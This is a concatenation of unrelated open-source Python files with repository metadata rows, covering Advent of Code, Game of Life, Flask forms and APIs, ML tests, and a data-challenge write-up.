obs_callable=lambda _: np.asarray([1., 1., 1.], dtype=np.float32))
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected output specs.
expected_observation_spec = input_obs_spec.copy()
expected_observation_spec['new_obs'] = (
specs.Array(shape=[3,], dtype=np.float32, name='new_obs'))
expected_output_spec = copy.deepcopy(input_spec)
# Check the specs.
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def test_add_obs_correctly_with_provided_specs(self):
new_obs_spec = specs.BoundedArray(
shape=(3,), dtype=np.int32, minimum=-1, maximum=3, name='new_obs')
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.array([1, 1, 1], dtype=np.int32),
obs_spec=new_obs_spec)
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected specs.
expected_observation_spec = dict(input_obs_spec)
expected_observation_spec['new_obs'] = new_obs_spec
expected_output_spec = copy.deepcopy(input_spec)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def _build_unit_timestep_spec(
observation_spec: Optional[Mapping[str, specs.Array]] = None,
reward_spec: Optional[specs.Array] = None,
discount_spec: Optional[specs.BoundedArray] = None):
if observation_spec is None:
name = 'foo'
observation_spec = {
name: specs.Array(shape=(2,), dtype=_DEFAULT_TYPE, name=name),
}
if reward_spec is None:
reward_spec = scalar_array_spec(name='reward')
if discount_spec is None:
discount_spec = scalar_array_spec(name='discount')
return spec_utils.TimeStepSpec(
observation_spec=observation_spec,
reward_spec=reward_spec,
discount_spec=discount_spec)
if __name__ == '__main__':
absltest.main()
| 39.358037 | 80 | 0.706747 | 37,005 | 0.904923 | 0 | 0 | 13,818 | 0.337906 | 0 | 0 | 4,055 | 0.099161 |
a81fa302f2ff4cbc6dc18bbb647920f29a503d5e | 1,897 | py | Python | 2017/23b.py | mcbor/advent_of_code_2016 | 14453b970d3e0f031ae6a66f2028652b6ed870dd | [
"MIT"
]
| 1 | 2016-12-17T10:53:22.000Z | 2016-12-17T10:53:22.000Z | 2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | [
"MIT"
]
| null | null | null | 2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
23b.py
~~~~~~
Advent of Code 2017 - Day 23: Coprocessor Conflagration
Part Two
Now, it's time to fix the problem.
The debug mode switch is wired directly to register a. You flip the switch,
which makes register a now start at 1 when the program is executed.
Immediately, the coprocessor begins to overheat. Whoever wrote this program
obviously didn't choose a very efficient implementation. You'll need to
optimize the program if it has any hope of completing before Santa needs
that printer working.
The coprocessor's ultimate goal is to determine the final value left in
register h once the program completes. Technically, if it had that... it
wouldn't even need to run the program.
After setting register a to 1, if the program were to run to completion,
what value would be left in register h?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
import math
def is_prime(n):
if n < 2:
return False
if n < 4:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
for i in range(5, int(math.sqrt(n)) + 1, 6):
if n % i == 0 or n % (i + 2) == 0:
return False
return True
def solve(instructions):
"""Return value of h.
Hand optimized.
"""
instr, reg, val = instructions.split('\n')[0].split()
assert instr == 'set'
assert reg == 'b'
b = int(val) * 100 + 100000
start = b - 17000
end = b + 1
return sum(not is_prime(x) for x in range(start, end, 17))
def main(argv):
if len(argv) == 2:
f = open(argv[1], 'r')
else:
sys.stderr.write('reading from stdin...\n')
f = sys.stdin
print(solve(f.read().strip()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 24.012658 | 79 | 0.615709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,109 | 0.584607 |
a81fc289f1eb7f0a4f761bd960c55555bea22c98 | 4,456 | py | Python | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | [
"MIT"
]
| null | null | null | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | [
"MIT"
]
| null | null | null | game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Sep 20 11:59:50 2018
@author: klaus
"""
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from argparse import ArgumentParser, RawTextHelpFormatter
class GameOfLife:
def __init__(self, width, height, interval, seed):
random.seed(seed)
self.height = height
self.width = width
self.interval = interval
self.epoch = 0
self.board = np.zeros((self.height, self.width))
for x in range(int(self.width / 2 - self.width / 4), int(self.width / 2 + self.width / 4 + 1)):
for y in range(int(self.height / 2 - self.height / 4), int(self.height / 2 + self.height / 4 + 1)):
self.board[y][x] = random.choice([0, 1])
self.fig, self.ax = plt.subplots(figsize=(10, 10), num=1)
self.fig.show()
self.plot_board()
def run(self):
while self.run_step():
time.sleep(self.interval)
def run_step(self):
self.epoch += 1
new_board = self.board.copy()
for x in range(self.width):
for y in range(self.height):
living_neighbors = self.board[y - 1 if y > 0 else self.height - 1][x - 1 if x > 0 else self.width - 1] + \
self.board[y - 1 if y > 0 else self.height - 1][x] + \
self.board[y - 1 if y > 0 else self.height - 1][x + 1 if x < self.width - 1 else 0] + \
self.board[y][x - 1 if x > 0 else self.width - 1] + \
self.board[y][x + 1 if x < self.width - 1 else 0] + \
self.board[y + 1 if y < self.height - 1 else 0][x - 1 if x > 0 else self.width - 1] + \
self.board[y + 1 if y < self.height - 1 else 0][x] + \
self.board[y + 1 if y < self.height - 1 else 0][x + 1 if x < self.width - 1 else 0]
if self.board[y][x] == 0 and living_neighbors == 3:
new_board[y][x] = 1
if self.board[y][x] == 1 and (living_neighbors < 2 or living_neighbors > 3):
new_board[y][x] = 0
if (self.board == new_board).all():
return False
self.board = new_board
self.plot_board()
return True
def plot_board(self):
print("Epoch:", self.epoch)
self.ax.clear()
self.ax.imshow(self.board, cmap="Greys", interpolation="None")
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if __name__ == "__main__":
argument_parser = ArgumentParser(description="""
Game of Life:
- Little python implementation of Conway's game of life.
- The game board will be visualized with matplotlib.
- See readme.md for more informations.""",
epilog="https://github.com/WinterWonderland/Game_of_Life",
formatter_class=RawTextHelpFormatter)
argument_parser.add_argument("--width",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--height",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--interval",
metavar="",
type=float,
default=0.3,
help="Interval time between each step (default=0.3)")
argument_parser.add_argument("--seed",
metavar="",
type=int,
default=None,
help="A seed for the random number generator to get identical play boards")
args = argument_parser.parse_args()
GameOfLife(width=args.width,
height=args.height,
interval=args.interval,
seed=args.seed).run()
input("press enter to quit")
| 41.64486 | 123 | 0.47711 | 2,446 | 0.548923 | 0 | 0 | 0 | 0 | 0 | 0 | 623 | 0.139811 |
a82054bcbbc93091d6cde0c3bba2fa420fc0e4b0 | 520 | py | Python | tests/mixins/back_tests.py | StuartMacKay/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | [
"MIT"
]
| 9 | 2020-05-16T20:26:33.000Z | 2021-11-02T06:24:46.000Z | tests/mixins/back_tests.py | StuartMacKay/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | [
"MIT"
]
| 17 | 2019-06-22T09:41:22.000Z | 2020-09-11T06:25:21.000Z | tests/mixins/back_tests.py | ProjectBabbler/ebird-api | 14b5c777548416a58abec05e25cd4b9a8e22f210 | [
"MIT"
]
| null | null | null | from ebird.api.constants import DEFAULT_BACK
from tests.mixins.base import BaseMixin
class BackTestsMixin(BaseMixin):
def test_back_is_sent(self):
query = self.api_call(back=10)[1]
self.assertEqual(query["back"], 10)
def test_default_back_is_not_sent(self):
query = self.api_call(back=DEFAULT_BACK)[1]
self.assertTrue("back" not in query)
def test_invalid_back_raises_error(self):
self.api_raises(ValueError, back=31)
self.api_raises(ValueError, back="x")
| 30.588235 | 51 | 0.709615 | 432 | 0.830769 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.028846 |
a820c01ed9ab1a3512b23d858002b832b81b6f26 | 506 | py | Python | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | [
"Apache-2.0"
]
| 6 | 2021-02-09T22:27:55.000Z | 2022-01-14T18:15:17.000Z | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | [
"Apache-2.0"
]
| 34 | 2021-02-09T22:23:33.000Z | 2022-03-31T16:22:51.000Z | examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | [
"Apache-2.0"
]
| 12 | 2021-02-09T21:17:10.000Z | 2022-02-09T16:35:39.000Z | """
Export data from Tamr using df-connect. An example where everything is default in config file,
which implies exported data is written back to same database as ingested from.
"""
import tamr_toolbox as tbox
my_config = tbox.utils.config.from_yaml("examples/resources/conf/connect.config.yaml")
my_connect = tbox.data_io.df_connect.client.from_config(my_config)
tbox.data_io.df_connect.client.export_dataset(
my_connect, dataset_name="example_dataset", target_table_name="example_target_table",
)
| 36.142857 | 94 | 0.8083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 265 | 0.523715 |
a822bff3f043bc516ac3c82ab2394920c525256d | 1,700 | py | Python | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | [
"MIT"
]
| null | null | null | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | [
"MIT"
]
| null | null | null | services/web/project/auth/forms.py | petervuyk456/persona_finance | 5c4c1bea0e176f37cc122571b846de1f020bdd92 | [
"MIT"
]
| null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField
from wtforms.validators import DataRequired, Length, EqualTo, URL
from project.auth.models import User
class LoginForm(FlaskForm):
username = StringField('Username', [DataRequired(), Length(max=64)])
password = PasswordField(
'Password', [DataRequired(), Length(min=6, max=255)])
remember = BooleanField("Remember Me")
def validate(self):
check_validate = super(LoginForm, self).validate()
if not check_validate:
return False
user = User.objects.get(username=self.username.data)
if not user:
self.username.errors.append('Invalid username or password')
return False
if not user.check_password(self.password.data):
self.username.errors.append('Invalid username or password')
return False
return True
class RegisterForm(FlaskForm):
username = StringField('Username', [DataRequired(), Length(max=64)])
password = PasswordField(
'Password', [DataRequired(), Length(min=6, max=255)])
confirm = PasswordField('Confirm Password', [
DataRequired(), EqualTo('password')])
def validate(self):
check_validate = super(RegisterForm, self).validate()
# if our validators do not pass
if not check_validate:
return False
try:
user = User.objects.get(username=self.username.data)
if user:
self.username.errors.append(
"User with that name already exists")
return False
except:
return True
| 32.075472 | 72 | 0.629412 | 1,498 | 0.881176 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.122353 |
a82471d2b32cd5726156914bf073feb69a5965b8 | 10,619 | py | Python | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | [
"MIT"
]
| null | null | null | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | [
"MIT"
]
| null | null | null | projectGo.py | KyleBrownCS/SoftDev2 | c992061a849f19f1ccbea71e4c0aa97fb2e135dc | [
"MIT"
]
| null | null | null | from flask import Flask, render_template, request, jsonify
import sqlite3
import json
import re
import logging
from applicationInfo import ApplicationInfo
logging.basicConfig(filename='/var/www/SoftDev2/projectGo.log', level=logging.DEBUG)
app = Flask(__name__)
applicationInfo = ApplicationInfo()
row_pos_obligationid = 0
row_pos_userid = 1
row_pos_name = 2
row_pos_description = 3
row_pos_starttime = 4
row_pos_endtime = 5
row_pos_priority = 6
row_pos_status = 7
row_pos_category = 8
def get_db():
db_connection = sqlite3.connect(applicationInfo.database_filepath)
db_cursor = db_connection.cursor()
return db_connection, db_cursor
@app.route('/')
def index():
return render_template("index.html")
@app.route('/addobligation')
def add_obligation_page():
return render_template("addobligation.html")
@app.route('/obligations', methods = ['GET'])
def get_all_obligations():
db_connection, db_cursor = get_db()
response = ""
data = []
for row in db_cursor.execute("select * from " + applicationInfo.OBLIGATION_TABLE_NAME):
obligation_entry = {
'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data.append(obligation_entry)
response = json.dumps(data)
return response, 200
@app.route('/schedule')
def sched():
return render_template("Schedule.html")
@app.route('/obligationlist')
def obligationlist():
return render_template("ObligationList.html")
@app.route('/obligations/<startTime>', methods = ['GET'])
def get_obligations_by_date(startTime):
db_connection, db_cursor = get_db()
response = ""
response_code = None
data = []
count = 0;
for row in db_cursor.execute("select * from " + applicationInfo.OBLIGATION_TABLE_NAME):
start_time = row[row_pos_starttime]
time_split = start_time.split(" ", 1)
start_time = time_split[0]
start_time.replace("'", "")
if start_time == startTime:
obligation_entry = {'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data.append(obligation_entry)
response = json.dumps(data)
count = count + 1
if 0 == count:
response_code = 404
else:
response_code = 200
return response, response_code
@app.route('/obligations/<int:obligation_id>', methods = ['GET'])
def get_obligation(obligation_id):
logging.debug('Attempting to GET obligation ' + str(obligation_id))
row = "";
response_code = None
#execute query and get all rows that match (since obligation_id is unique there will be 0 or 1
db_connection, db_cursor = get_db()
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + " = " + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
row = row[0]
data = {
'obligationid' : row[row_pos_obligationid], #obligationid
'userid' : row[row_pos_userid], #userid
'name' : row[row_pos_name], #name
'description' : row[row_pos_description], #description
'starttime' : row[row_pos_starttime], #starttime
'endtime' : row[row_pos_endtime], #endtime
'priority' : row[row_pos_priority], #priority
'status' : row[row_pos_status], #status
'category' : row[row_pos_category]} #category
data = json.dumps(data)
response_code = 200
logging.debug('Obligation ' + str(obligation_id) + ' was found')
else:
data = jsonify({'error': 1})
response_code = 404
logging.debug('Obligation ' + str(obligation_id) + ' could not be found')
return data, response_code
@app.route('/obligations', methods = ['POST'])
def create_obligation():
logging.debug('Attempting to create a new Obligation')
db_connection, db_cursor = get_db()
response = ""
response_code = None
user_id = request.form['userid']
name = request.form['name']
description = request.form['description']
start_time = request.form['starttime']
end_time = request.form['endtime']
priority = request.form['priority']
status = request.form['status']
category = request.form['category']
try:
db_cursor.execute("insert into " + applicationInfo.OBLIGATION_TABLE_NAME + " (obligationid, userid, name, description, starttime, endtime, priority, status, category) values (?, ?, ?, ?, ?, ?, ?, ?, ?)", (None, user_id, name, description, start_time, end_time, priority, status, category))
#get the inserted obligations id so that it can be returned
result = db_cursor.execute("select last_insert_rowid() FROM " + applicationInfo.OBLIGATION_TABLE_NAME).fetchall()
if (len(result) > 0):
result = result[0]
obligation_id = result[0]
db_connection.commit()
response = jsonify({'obligation_id': obligation_id, 'result': "successfully added:" + name})
response_code = 200
logging.debug('Creation of obligation ' + str(obligation_id) + ' was a success')
except Exception, e:
logging.error('Obligation could not be created. Error message: ' + str(e))
response = jsonify({'error': str(e)})
response_code = 400
return response
@app.route('/obligations/<int:obligation_id>', methods = ['POST'])
def modify_obligation(obligation_id):
logging.debug('attempting to edit obligation: ' + str(obligation_id))
logging.debug('incoming update data: ' + str(request.form))
db_connection, db_cursor = get_db()
response = ""
response_code = None
try:
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
row = row[0]
keys = request.form.keys()
if 'userid' in keys:
user_id = request.form['userid']
else:
user_id = row[row_pos_userid]
if 'name' in keys:
name = request.form['name']
else:
name = row[row_pos_name]
if 'description' in keys:
description = request.form['description']
else:
description = row[row_pos_description]
if 'starttime' in keys:
start_time = request.form['starttime']
else:
start_time = row[row_pos_starttime]
if 'endtime' in keys:
end_time = request.form['endtime']
else:
end_time = row[row_pos_endtime]
if 'priority' in keys:
priority = request.form['priority']
else:
priority = row[row_pos_priority]
if 'status' in keys:
status = request.form['status']
else:
status = row[row_pos_status]
if 'category' in keys:
category = request.form['category']
else:
category = row[row_pos_category]
db_cursor.execute("update " + applicationInfo.OBLIGATION_TABLE_NAME + " set userid=?, name=?, description=?, starttime=?, endtime=?, priority=?, status=?, category=? where obligationid = ?", (user_id, name, description, start_time, end_time, priority, status, category, obligation_id))
db_connection.commit()
response_code = 200
logging.debug('Obligation was updated and commited to the db')
else:
logging.debug('Obligation ' + str(obligation_id) + ' could not be found or does not exist')
response = jsonify({'error': '404 - No such obligation id'})
response_code = 404
except Exception, e:
response = jsonify({'error': str(e)})
response_code = 500
logging.error('An error occured while trying to update obligation ' + str(obligation_id) + '. error message: ' + str(e))
return response, response_code
@app.route('/obligations/<int:obligation_id>', methods = ['DELETE'])
def delete_obligation(obligation_id):
logging.debug('Attempting to DELETE obligation ' + str(obligation_id))
db_connection, db_cursor = get_db()
response = ""
response_code = None
try:
if (isinstance(obligation_id,(int,long))):
my_query = "select * from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id)
row = db_cursor.execute(my_query).fetchall()
if (len(row) > 0):
db_cursor.execute("delete from " + applicationInfo.OBLIGATION_TABLE_NAME + " where " + applicationInfo.OBLIGATION_ID_NAME + "=" + str(obligation_id))
db_connection.commit()
response = jsonify({'success': 'OK successfully deleted'})
response_code = 200
else:
response = jsonify({'error': 'No such obligation id'})
response_code = 404
else:
response = jsonify({'error': 'Bad Request - Info not properly provided'})
response_code = 400
except Exception, e:
logging.error('Could not delete obligation ' + str(obligation_id) + '. Error message: ' + str(e))
response = jsonify({'error': str(e)})
response_code = 500
return response, response_code
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=int('5000'))
| 39.475836 | 297 | 0.617384 | 0 | 0 | 0 | 0 | 9,861 | 0.928619 | 0 | 0 | 2,469 | 0.232508 |
a8247bed0a1cb5051fa0d35c0fab64fca16aa20d | 1,396 | py | Python | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | [
"Apache-2.0"
]
| null | null | null | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | [
"Apache-2.0"
]
| null | null | null | python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | [
"Apache-2.0"
]
| null | null | null | # Copyright (c) 2018, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from cuml import DBSCAN as cuDBSCAN
from sklearn.cluster import DBSCAN as skDBSCAN
from test_utils import array_equal
import cudf
import numpy as np
@pytest.mark.parametrize('datatype', [np.float32, np.float64])
def test_dbscan_predict(datatype):
gdf = cudf.DataFrame()
gdf['0']=np.asarray([1,2,2,8,8,25],dtype=datatype)
gdf['1']=np.asarray([2,2,3,7,8,80],dtype=datatype)
X = np.array([[1, 2], [2, 2], [2, 3], [8, 7], [8, 8], [25, 80]], dtype = datatype)
print("Calling fit_predict")
cudbscan = cuDBSCAN(eps = 3, min_samples = 2)
cu_labels = cudbscan.fit_predict(gdf)
skdbscan = skDBSCAN(eps = 3, min_samples = 2)
sk_labels = skdbscan.fit_predict(X)
print(X.shape[0])
for i in range(X.shape[0]):
assert cu_labels[i] == sk_labels[i]
| 32.465116 | 86 | 0.703438 | 0 | 0 | 0 | 0 | 637 | 0.456304 | 0 | 0 | 613 | 0.439112 |
a827531247ffd24ded530b9e0dea0c181d142c7b | 114 | py | Python | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
]
| 2 | 2022-01-22T07:56:58.000Z | 2022-01-24T00:29:37.000Z | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
]
| null | null | null | math_and_algorithm/024.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
]
| null | null | null | N = int(input())
ans = 0
for _ in range(N):
p, q = map(int, input().split())
ans += (1 / p) * q
print(ans) | 19 | 36 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a8276b0d3215a9fe2604eec700ad87c77dc2f29b | 769 | py | Python | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | [
"MIT"
]
| 1 | 2020-05-13T19:16:23.000Z | 2020-05-13T19:16:23.000Z | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | [
"MIT"
]
| null | null | null | LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | [
"MIT"
]
| null | null | null | from heapq import heappush, heappop
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __lt__(self, other):
return self.val < other.val
def mergeKLists(lists):
result = ListNode(-1)
p = result
heap = []
for l in lists:
if l: heappush(heap, l)
while heap:
cur = heappop(heap)
if cur.next: heappush(heap, cur.next)
p.next = cur
p = p.next
return result.next
l1 = ListNode(1)
l1.next = ListNode(4)
l1.next.next = ListNode(5)
l2 = ListNode(1)
l2.next = ListNode(3)
l2.next.next = ListNode(4)
l3 = ListNode(2)
l3.next = ListNode(6)
l3 = mergeKLists([l1, l2, l3])
p = l3
while p:
print(p.val, end=" ") # 1 1 2 3 4 4 5 6
p = p.next
print() | 17.477273 | 45 | 0.579974 | 154 | 0.20026 | 0 | 0 | 0 | 0 | 0 | 0 | 20 | 0.026008 |
a8281ad0fab5136b54ef02f2bff2a74dd9aaaf90 | 166 | py | Python | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | [
"BSD-3-Clause"
]
| null | null | null | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | [
"BSD-3-Clause"
]
| null | null | null | archiver/utils.py | jenrik/archiver | b9e10661d6a79b745796b248c35287db232da8ff | [
"BSD-3-Clause"
]
| null | null | null | def archive_link(link):
# Create a snapshot of the link on the internet archive
# ToDo
# Ref: https://archive.readme.io/docs/creating-a-snapshot
pass
| 27.666667 | 61 | 0.692771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.710843 |
a82a766dd5a8919e5aec354cbe63b71c9cd59549 | 2,297 | py | Python | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | [
"MIT"
]
| 1 | 2021-07-09T11:51:04.000Z | 2021-07-09T11:51:04.000Z | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | [
"MIT"
]
| null | null | null | source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | [
"MIT"
]
| null | null | null | import argparse
import glob
import numpy as np
import os
import skimage.io
import torch
import tifffile
from cellpose import models
def _parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=str,
default=None,
required=True,
help="Input image or folder with images to mask.",
)
parser.add_argument(
"-o",
"--output",
type=str,
default=None,
required=False,
help="Output folder, default mask within input folder",
)
parser.add_argument(
"-t",
"--target",
type=str,
default=None,
required=False,
help="Target channel tag, if provided, it will look for files with the tag.",
)
args = parser.parse_args()
return args
def main():
"""Create cell masks and save them into mask folder within input folder."""
args = _parse_args()
if os.path.isdir(args.input):
inputs = glob.glob(f"{args.input}/*tif")
elif os.path.isfile(args.input):
inputs = [args.input]
else:
raise ValueError(f"Expected input folder or file. Provided {args.input}.")
if args.target is not None:
inputs = [x for x in inputs if args.target in x]
output = args.output
if output is None:
output = f"{os.path.abspath(args.input)}/mask"
if not os.path.exists(output):
os.mkdir(output)
cellpose_model = models.Cellpose(model_type="cyto", gpu=False)
for input_file in inputs:
img = skimage.io.imread(input_file)
middle_slice = len(img) // 2
if len(img.shape) == 4:
mask_nucl, *_ = cellpose_model.eval(
[np.max(img, axis=1)[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
if len(img.shape) == 3:
mask_nucl, *_ = cellpose_model.eval(
[img[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
name = os.path.basename(input_file)
out = f"{output}/{name}"
tifffile.imsave(out, mask_nucl[0])
if __name__ == "__main__":
main()
| 25.241758 | 85 | 0.562908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 462 | 0.201132 |
a82b6067d87e3c320c8e0fb55b9b998dccade592 | 14,134 | py | Python | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | [
"MIT"
]
| null | null | null | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | [
"MIT"
]
| 1 | 2021-06-08T02:43:08.000Z | 2021-06-08T03:05:21.000Z | 02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | [
"MIT"
]
| null | null | null | # # Customer cliff dive data challenge
# 2020-02-17
# Leslie Emery
# ## Summary
# ### The problem
# The head of the Yammer product team has noticed a precipitous drop in weekly active users, which is one of the main KPIs for customer engagement. What has caused this drop?
# ### My approach and results
# I began by coming up with several questions to investigate:
# - Was there any change in the way that weekly active users is calculated?
# - This does not appear to be the case. To investigate this, I began by replicating the figure from the dashboard. I calculated a rolling 7-day count of engaged users, making sure to use the same method across the entire time frame covered by the dataset, and it still showed the same drop in engagement.
# - Was there a change in any one particular type of "engagement"?
# - I looked at a rolling 7-day count of each individual type of engagement action. From plotting all of these subplots, it looks to me like home_page, like_message, login, send_message, and view_inbox are all exhibiting a similar drop around the same time, so it's these underlying events that are driving the drop.
# - Could a change in the user interface be making it more difficult or less pleasant for users?
# - I couldn't find information in the available datasets to address this question. The `yammer_experiments` data set has information about experiments going on, presumably in the user interface. All of the listed experiments happened in June of 2014, though, which I think is too early to have caused the August drop in engagement.
# - Is this drop a seasonal change that happens around this time every year?
# - Because the data is only available for the period of time shown in the original dashboard, I can't investigate this question. I'd be very interested to see if there is a pattern of reduced engagement at the end of the summer, perhaps related to vacation or school schedules.
# - Are users visiting the site less because they're getting more content via email?
